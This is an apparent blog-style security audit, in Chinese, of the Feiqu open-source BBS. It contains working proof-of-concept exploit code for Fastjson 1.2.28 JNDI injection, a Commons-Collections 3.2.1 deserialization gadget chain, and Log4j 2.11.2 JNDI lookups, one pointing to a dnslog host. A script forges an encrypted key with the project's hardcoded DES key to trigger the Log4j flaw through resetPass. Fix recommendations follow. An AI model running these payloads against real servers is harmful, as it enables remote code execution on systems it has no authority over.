飞趣开源BBS代码审计报告（JAVA版）<\/h1>

1. 环境部署<\/h2>
飞趣BBS是一个基于SpringBoot搭建的开源论坛系统，源码可在Gitee获取。根据README.md文件，可以将其导入IDEA进行环境搭建。<\/p>
项目目录结构：<\/p>
主要功能集中在feiqu-front<\/code>模块，包含所有控制器<\/li>
其他目录多为辅助性功能模块<\/li>
<\/ul>
2. 第三方组件漏洞审计<\/h2>
2.1 Fastjson反序列化漏洞<\/h3>
漏洞版本<\/strong>：1.2.28

漏洞验证<\/strong>：<\/p>

创建三个测试文件验证漏洞可利用性：<\/li>
<\/ol>
JNDIPayload.java<\/strong>：<\/p>
import<\/span> java.io.IOException;<\/span>
<\/span><\/span>public<\/span> class<\/span> JNDIPayload<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>JNDIServer.java<\/strong>：<\/p>
import<\/span> com.sun.jndi.rmi.registry.ReferenceWrapper;<\/span>
<\/span><\/span>import<\/span> javax.naming.Reference;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>        Reference reference =<\/span> new<\/span> Reference(<\/span>"Exploit"<\/span>,<\/span> "JNDIPayload"<\/span>,<\/span> "http:\/\/127.0.0.1:8000\/"<\/span>);<\/span>
<\/span><\/span>        ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>reference);<\/span>
<\/span><\/span>        registry.<\/span>bind<\/span>(<\/span>"Exploit"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>JNDIClient.java<\/strong>：<\/p>
import<\/span> com.alibaba.fastjson.JSON;<\/span>
<\/span><\/span>public<\/span> class<\/span> JNDIClient<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args){<\/span>
<\/span><\/span>        String text =<\/span> "{\n"<\/span> +<\/span>
<\/span><\/span>                " \"a\": {\n"<\/span> +<\/span>
<\/span><\/span>                " \"@type\": \"java.lang.Class\", \n"<\/span> +<\/span>
<\/span><\/span>                " \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\n"<\/span> +<\/span>
<\/span><\/span>                " }, \n"<\/span> +<\/span>
<\/span><\/span>                " \"b\": {\n"<\/span> +<\/span>
<\/span><\/span>                " \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \n"<\/span> +<\/span>
<\/span><\/span>                " \"dataSourceName\": \"rmi:\/\/127.0.0.1:1099\/Exploit\", \n"<\/span> +<\/span>
<\/span><\/span>                " \"autoCommit\": true\n"<\/span> +<\/span>
<\/span><\/span>                " }\n"<\/span> +<\/span>
<\/span><\/span>                "}"<\/span>;<\/span>
<\/span><\/span>        JSON.<\/span>parseObject<\/span>(<\/span>text);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
验证步骤：

开启Python HTTP服务：python -m http.server 8000<\/code><\/li>
启动JNDIServer<\/li>
运行JNDIClient<\/li>
成功触发计算器弹出，证明漏洞存在<\/li>
<\/ul>
<\/li>
<\/ol>
实际利用分析<\/strong>：<\/p>

查找路由\/u\/{uid}\/home<\/code>，发现存在JSON.parseObject<\/code>调用<\/li>
但redisString.get()<\/code>返回数据为null（key为thought_top_list<\/code>）<\/li>
发现置顶"想法"会被设置到redis的thought_top_list<\/code>键<\/li>
即使获取到redis值，内容也不可控，无法利用<\/li>
<\/ul>
2.2 Commons-Collections反序列化漏洞<\/h3>
漏洞版本<\/strong>：3.2.1

漏洞验证<\/strong>：<\/p>
CcSerial.java<\/strong>：<\/p>
import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.keyvalue.TiedMapEntry;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> CcSerial<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Transformer[]<\/span> fakeTransformers =<\/span> new<\/span> Transformer[]{<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>)};<\/span>
<\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>                new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>                new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                    new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>                new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                    new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                    new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>                new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                    new<\/span> String[]{<\/span>"calc.exe"<\/span>}),<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>fakeTransformers);<\/span>
<\/span><\/span>        Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        Map outerMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> chainedTransformer);<\/span>
<\/span><\/span>        TiedMapEntry mapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>outerMap,<\/span> null<\/span>);<\/span>
<\/span><\/span>        Map expMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        expMap.<\/span>put<\/span>(<\/span>mapEntry,<\/span> null<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>chainedTransformer,<\/span> "iTransformers"<\/span>,<\/span> transformers);<\/span>
<\/span><\/span>        innerMap.<\/span>clear<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        ByteArrayOutputStream barr =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>barr);<\/span>
<\/span><\/span>        out.<\/span>writeObject<\/span>(<\/span>expMap);<\/span>
<\/span><\/span>        out.<\/span>close<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>barr.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>        in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        in.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String field,<\/span> Object arg)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Field f =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>field);<\/span>
<\/span><\/span>        f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        f.<\/span>set<\/span>(<\/span>obj,<\/span> arg);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>实际利用分析<\/strong>：<\/p>

项目中仅发现一处readObject<\/code>调用<\/li>
但无调用该方法的地方，无法利用<\/li>
<\/ul>
2.3 Log4j JNDI注入漏洞<\/h3>
漏洞版本<\/strong>：2.11.2

漏洞验证<\/strong>：<\/p>
Log4jTest.java<\/strong>：<\/p>
import<\/span> org.apache.logging.log4j.LogManager;<\/span>
<\/span><\/span>import<\/span> org.apache.logging.log4j.Logger;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Log4jTest<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        Logger logger =<\/span> LogManager.<\/span>getLogger<\/span>(<\/span>Log4jTest.<\/span>class<\/span>);<\/span>
<\/span><\/span>        logger.<\/span>error<\/span>(<\/span>"${jndi:ldap:\/\/rzepki.dnslog.cn}"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>实际利用分析<\/strong>：<\/p>


在UserController.java<\/code>中找到可利用点：<\/p>

方法：resetPass<\/code><\/li>
关键参数：key<\/code>、password<\/code>、verifyCode<\/code><\/li>
key<\/code>会被解密后赋值给username<\/code><\/li>
<\/ul>
<\/li>

加密流程分析：<\/p>

key<\/code>首先被Base64解码<\/li>
然后使用DES解密（密钥为cwd22<\/code>）<\/li>
解密后赋值给username<\/code><\/li>
<\/ul>
<\/li>

漏洞利用步骤：<\/p>

使用encryptString<\/code>方法加密Log4j的Exp<\/li>
本地开启JNDI注入工具（如JNDI-Injection-Exploit）<\/li>
生成恶意key的脚本：<\/li>
<\/ul>
<\/li>
<\/ol>
public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Key key =<\/span> null<\/span>;<\/span>
<\/span><\/span>    String keyStr =<\/span> "cwd22"<\/span>;<\/span>
<\/span><\/span>    String desKey =<\/span> Base64.<\/span>encode<\/span>(<\/span>keyStr.<\/span>getBytes<\/span>(<\/span>"UTF-8"<\/span>));<\/span>
<\/span><\/span>    DESKeySpec objDesKeySpec =<\/span> new<\/span> DESKeySpec(<\/span>desKey.<\/span>getBytes<\/span>(<\/span>"UTF-8"<\/span>));<\/span>
<\/span><\/span>    SecretKeyFactory objKeyFactory =<\/span> SecretKeyFactory.<\/span>getInstance<\/span>(<\/span>"DES"<\/span>);<\/span>
<\/span><\/span>    key =<\/span> objKeyFactory.<\/span>generateSecret<\/span>(<\/span>objDesKeySpec);<\/span>
<\/span><\/span>    
<\/span><\/span>    String str =<\/span> "${jndi:ldap:\/\/127.0.0.1:1389\/riv58u}"<\/span>;<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> bytes =<\/span> str.<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>    Cipher cipher =<\/span> Cipher.<\/span>getInstance<\/span>(<\/span>"DES"<\/span>);<\/span>
<\/span><\/span>    cipher.<\/span>init<\/span>(<\/span>Cipher.<\/span>ENCRYPT_MODE<\/span>,<\/span> key);<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> encryptStrBytes =<\/span> cipher.<\/span>doFinal<\/span>(<\/span>bytes);<\/span>
<\/span><\/span>    String s =<\/span> Base64.<\/span>encode<\/span>(<\/span>encryptStrBytes);<\/span>
<\/span><\/span>    System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>s);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
构造请求参数提交，成功触发漏洞<\/li>
<\/ol>
3. 漏洞修复建议<\/h2>


Fastjson<\/strong>：<\/p>

升级到最新安全版本（≥1.2.83）<\/li>
使用SafeMode<\/code>或配置ParserConfig.getGlobalInstance().setSafeMode(true)<\/code><\/li>
<\/ul>
<\/li>

Commons-Collections<\/strong>：<\/p>

升级到3.2.2或更高版本<\/li>
使用SerializationKiller<\/code>等防护工具<\/li>
<\/ul>
<\/li>

Log4j<\/strong>：<\/p>

升级到2.17.1或更高版本<\/li>
设置JVM参数：-Dlog4j2.formatMsgNoLookups=true<\/code><\/li>
移除JndiLookup<\/code>类：zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
4. 总结<\/h2>
本次审计发现了三个潜在的安全漏洞：<\/p>

Fastjson 1.2.28反序列化漏洞 - 实际利用受限<\/li>
Commons-Collections 3.2.1反序列化漏洞 - 无直接利用点<\/li>
Log4j 2.11.2 JNDI注入漏洞 - 可实际利用<\/li>
<\/ol>
最严重的漏洞是Log4j的JNDI注入，可通过UserController#resetPass<\/code>方法触发，建议优先修复。<\/p>